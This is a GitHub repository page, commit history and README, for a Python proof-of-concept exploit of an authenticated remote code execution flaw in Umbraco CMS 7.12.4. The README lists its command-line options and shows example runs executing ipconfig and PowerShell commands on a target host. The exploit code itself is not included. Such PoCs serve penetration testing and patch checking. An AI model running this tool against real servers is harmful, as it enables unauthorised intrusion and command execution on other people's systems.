
Umbraco-RCE


Commits

List of commits on branch master.
b2ee3d9579118ca12d28787b072afa9261e76f7e (Verified)
add EDB exploit
noraj committed 4 years ago

c88f2f6131bb8abfa4b3600f8d8ecfc47ef1d9d8 (Verified)
add exploit links
noraj committed 4 years ago

55b3d603955c83d10d30f9a9ee52698913c5d725 (Verified)
simple pip requirements file (#5)
edrapac committed 5 years ago

ed3cf40e8962b0efd51834d1bf0f81dd9a5fb167 (Verified)
Update README.md
noraj committed 5 years ago

e95ad31dfdcb6bb000aa0057c568184c0422be89 (Verified)
add Requirements
noraj committed 5 years ago

06223ea1454b7aa22a051d691ad8a044587c9b40 (Verified)
add arguments
noraj committed 5 years ago

README

The README file for this repository.

Umbraco RCE exploit / PoC

Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution

[EDB-49488] [PacketStorm] [WLB-2020080012]

Usage

$ python exploit.py -h
usage: exploit.py [-h] -u USER -p PASS -i URL -c CMD [-a ARGS]

Umbraco authenticated RCE

optional arguments:
  -h, --help                 show this help message and exit
  -u USER, --user USER       username / email
  -p PASS, --password PASS   password
  -i URL, --host URL         root URL
  -c CMD, --command CMD      command
  -a ARGS, --arguments ARGS  arguments

Examples:

$ python exploit.py -u admin@example.org -p password123 -i 'http://10.0.0.1' -c ipconfig
$ python exploit.py -u admin@example.org -p password123 -i 'http://10.0.0.1' -c powershell.exe -a '-NoProfile -Command ls'

Requirements

Example for ArchLinux:

pacman -S python-beautifulsoup4 python-requests

Example using pip:

pip3 install -r requirements.txt

Reference

This is a better rewrite of EDB-ID-46153 that takes command-line arguments (instead of hardcoded values) and displays the command's stdout.

Tested with Python 3.8.